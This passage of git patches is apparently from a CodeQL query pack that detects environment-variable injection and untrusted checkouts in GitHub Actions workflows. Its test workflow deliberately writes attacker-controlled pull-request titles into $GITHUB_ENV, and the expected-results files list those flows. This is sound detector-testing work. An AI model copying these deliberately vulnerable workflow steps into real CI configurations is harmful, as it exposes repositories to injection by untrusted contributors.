coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths From 0f3281c38627ed3d2d5e1812a701f52610209c27 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 28 Apr 2024 09:36:27 +0200 Subject: [PATCH 0226/1267] Support bash heredoc --- ql/lib/codeql/actions/Ast.qll | 38 ++++++++++++++++++- .../actions/security/EnvVarInjectionQuery.qll | 5 ++- ql/src/Security/CWE-077/EnvPathInjection.ql | 2 + ql/src/Security/CWE-077/EnvVarInjection.ql | 20 ++++++---- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +-- .../CWE-077/PrivilegedEnvVarInjection.ql | 24 ++++++------ .../CWE-077/.github/workflows/test4.yml | 9 ++++- .../Security/CWE-077/EnvVarInjection.expected | 9 +++-- .../PrivilegedEnvVarInjection.expected | 11 ++++-- 9 files changed, 92 insertions(+), 32 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8e36aef408e..bfbc990d671 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -46,18 +46,39 @@ module Utils { bindingset[var] private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV result = - ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } bindingset[var] private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } + bindingset[var] + private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" + } + bindingset[script, var] predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment @@ -87,6 +108,19 @@ module Utils { .splitAt("\n") + ")" and key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) } bindingset[line] diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6e6e768bdf7..0467a51f4e9 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -39,7 +39,10 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { * that is used to construct and evaluate an environment variable. */ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" + } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 50ad0149703..80d1729b267 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -20,8 +20,10 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 109d77d7425..8c251095457 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -16,23 +16,29 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index 593fd620c9f..a25473fd812 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -19,10 +19,8 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bf637af1195..5311d9a4de8 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,20 +16,22 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 5061f51db62..154a8135bad 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -42,12 +42,19 @@ jobs: - env: TITLE: ${{ github.event.pull_request.title }} run: | - cat <<-"EOF" >> "$GITHUB_ENV" + cat <<-EOF >> "$GITHUB_ENV" echo "FOO=$TITLE" EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.head_ref }} + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.event.pull_request.title }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 1cb0b78a29b..241a33146b8 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 701cefe2b79..8c9d923bd35 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths @@ -40,4 +43,6 @@ subpaths | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | From 831b8cfaa6f0aca1369ae2d6a28b39af20217279 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 28 Apr 2024 12:03:40 +0200 Subject: [PATCH 0227/1267] Bump qlpack versions --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 -- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 2 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 754d28cb93e..6dd9b5d3617 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -211,8 +211,6 @@ class EventSource extends RemoteFlowSource { or textEvent(context) and flag = "text" or - repoNameEvent(context) and flag = "repo name" - or branchEvent(context) and flag = "branch" or labelEvent(context) and flag = "label" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1710768761f..3800ce9e85c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.18 +version: 0.0.19 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 24f07dafe89..c431636c96a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.18 +version: 0.0.19 groups: - actions - queries From 9843f375ee7acc33f2d26a268d48d10e031c0a44 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Apr 2024 12:20:53 +0200 Subject: [PATCH 0228/1267] ignore runtime info for pull_request triggered workflows --- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0c53dae6371..0cbb8ab10ed 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -635,19 +635,22 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the workflow is privileged. */ predicate isPrivileged() { - // The job has a permission to write to some scope + // the job has an explicit write permission this.getPermissions().getAPermission() = "write" or - // The job accesses a secret + // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or - // The effective permissions have write access - exists(string path, string name, string secrets_source, string perms | - workflowDataModel(path, _, name, secrets_source, perms, _) and + // the effective permissions have write access + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and name.trim().matches(this.getId() + "%") and + // We cannot trust the permissions for pull_request events since they depend on the + // location of the head branch + not trigger.trim() = "pull_request" and ( secrets_source.trim().toLowerCase() = "actions" or perms.toLowerCase().matches("%write%") From 16c77cbe255a72c263bcdf63ac93ad8b7c12f06c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 4 May 2024 23:27:26 +0200 Subject: [PATCH 0229/1267] Refactor untrusted checkout queries --- .../security/ArtifactPoisoningQuery.qll | 85 +------ .../actions/security/PoisonableSteps.qll | 64 +++++ .../security/UntrustedCheckoutQuery.qll | 229 ++++++++++++++++++ ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 150 ------------ ...dCheckout.md => UntrustedCheckoutError.md} | 0 .../CWE-829/UntrustedCheckoutError.ql | 28 +++ .../CWE-829/UntrustedCheckoutWarning.md | 0 .../CWE-829/UntrustedCheckoutWarning.ql | 28 +++ ql/src/qlpack.yml | 2 +- .../.github/workflows/artifactpoisoning21.yml | 2 +- .../.github/workflows/artifactpoisoning22.yml | 2 +- .../CWE-829/ArtifactPoisoning.expected | 8 +- .../PrivilegedArtifactPoisoning.expected | 12 +- .../Security/CWE-829/UntrustedCheckout.qlref | 1 - .../CWE-829/UntrustedCheckoutError.expected | 6 + .../CWE-829/UntrustedCheckoutError.qlref | 1 + ...cted => UntrustedCheckoutWarning.expected} | 6 - .../CWE-829/UntrustedCheckoutWarning.qlref | 1 + 19 files changed, 383 insertions(+), 244 deletions(-) create mode 100644 ql/lib/codeql/actions/security/PoisonableSteps.qll create mode 100644 ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckout.ql rename ql/src/Security/CWE-829/{UntrustedCheckout.md => UntrustedCheckoutError.md} (100%) create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.ql create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckout.expected => UntrustedCheckoutWarning.expected} (79%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 8b7eb51276d..3635004bc31 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ 